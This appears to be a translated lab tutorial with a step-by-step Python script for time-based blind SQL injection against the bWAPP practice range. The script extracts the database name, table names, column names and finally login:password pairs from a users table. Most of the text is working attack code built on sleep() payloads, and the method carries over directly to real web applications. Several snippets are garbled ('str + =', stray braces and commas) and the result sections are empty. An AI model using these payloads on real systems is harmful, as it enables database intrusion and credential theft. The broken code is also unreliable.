Article directory
- 1. Get the database name length
- 2. Get the database name
- 3. Get the total length of the table name
- 4. Get the table name
- 5. Get the total length of the specified table column name
- 6. Get the column name of the specified table
- 7. Obtain the total length of data in the specified column of the specified table
- 8. Obtain the data in the specified column of the specified table
1. Get the database name length
The test environment is bwapp shooting range SQL Injection – Blind – Time-Based
import requests import time HEADER={<!-- --> "Cookie":"BEEFHOOK=sC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; security=low; PHPSESSID=i79vfbbj4l30k326ckunvitfe5; security_level=0 " } BASE_URL="http://127.0.0.1:9004/sqli_15.php?" def get_database_name_length(value1, value2): count = 0 for i in range(100): url=BASE_URL + "{}=Man of Steel' and length(database())={} and sleep(1) -- {}".format(value1, i, value2) start_time = time.time() resp= requests.get(url,headers=HEADER) #print(resp.content) if time.time()-start_time>1: print("The database length is: {}".format(i)) count = i break return count
Execute statement:
databaselen = get_database_name_length(“title”, “ & action=search”) + 1
Results of the
tips:title=, & amp;action=search needs to be obtained by using burp packet capture
– There are spaces on both sides
2. Get database name
def get_database_name(len, value1, value2): str = "" for i in range(1,len): for j in range(127): url=BASE_URL + "{}=Man of Steel' and ascii(substr(database(),{},1))={} and sleep(2) -- {}".format(value1, i, j, value2 ) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>2: print("{}:{}".format(i,j),chr(j)) str + =(chr(j)) break print("Database name is:",str) return str
Execute statement:
database = get_database_name(databaselen,“title”, “ & amp;action=search”)
Results of the
3. Get the total length of the table name
def get_table_name_length(database, value1, value2): count = 0 for i in range(100): url=BASE_URL + "{}=Man of Steel' and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'), 1)) ={} and sleep(1) -- { }".format(value1, database,i, value2) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>1: print("The total length of the table name is: {}".format(i)) count = i break return count
Execute statement:
tablelen = get_table_name_length(database,“title”, “ & amp;action=search”) + 1
Execution result:
4. Get table name
def get_table_name(len,database, value1, value2): str = "" for i in range(1,len): for j in range(127): url=BASE_URL + "{}=Man of Steel' and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = '{}'),{},1))={} and sleep(2) -- {}".format(value1, database, i,j, value2) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>2: #print("{}:{}".format(i,j),chr(j)) str + =(chr(j)) break print("{}:".format(i),str) print("Table name:",str) return str
Execute statement:
get_table_name(tablelen,database,“title”, “ & amp;action=search”)
Results of the:
,
5. Get the total length of the specified table column name
def get_column_name_length(database,table, value1, value2): count = 0 for i in range(100): url=BASE_URL + "{}=Man of Steel' and length(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1)) ={} and sleep(1) -- {}".format(value1, table,database,i, value1) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>1: print("The total length of column names is: {}".format(i)) count = i break return count
Execute statement:
columnlen = get_column_name_length(database, “users”, “title”, “ & amp;action=search”) + 1
Results of the:
6. Get the column name of the specified table
def get_column_name(len,database, table, value1, value2): str = "" for i in range(1,len): for j in range(127): url=BASE_URL + "{}=Man of Steel' and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}'), 1),{} ,1))={} and sleep(2) -- {}".format(value1, table, database, i,j, value2) start_time = time.time() resp= requests.get(url,headers=HEADER), if time.time()-start_time>2: str + =(chr(j)) break print("{}:".format(i),str) print("Column name:",str) return str
Execute statement:
get_column_name(columnlen, database, “users”, “title”, “ & amp;action=search”)
Results of the:
7. Get the total length of data in the specified column of the specified table
def get_data_name_length(table, username, password, value1, value2): count = 0 for i in range(100): url=BASE_URL + "{}=Man of Steel' and length(substr((select group_concat({}, ':', {}) from {}), 1)) ={} and sleep(1) -- { }".format(value1, username, password, table,i, value2) start_time = time.time() resp= requests.get(url,headers=HEADER) if time.time()-start_time>1: print("The total length of column data is: {}".format(i)) count = i break return count
Execute statement:
datalen = get_data_name_length(“users”, “login”, “password”, “title”, “ & amp;action=search”) + 1
Results of the:
8. Get the data in the specified column of the specified table
def get_data_name(len, table, username, password, value1, value2): str = "" for i in range(1,len): for j in range(127): url=BASE_URL + "{}=Man of Steel' and ascii(substr((select group_concat({}, ':', {}) from {}),{},1))={} and sleep(2) -- {}".format(value1, username, password, table, i,j, value2) start_time = time.time() resp= requests.get(url,headers=HEADER), if time.time()-start_time>2: str + =(chr(j)) break print("{}:".format(i),str) print("Login data is:",str) return str
Execute statement:
get_data_name(datalen, “users”, “login”, “password”, “title”, “ & amp;action=search”)
Results of the:
We found that using this method seems to be faster and more efficient than burp, but you need to choose the table name yourself starting from column blasting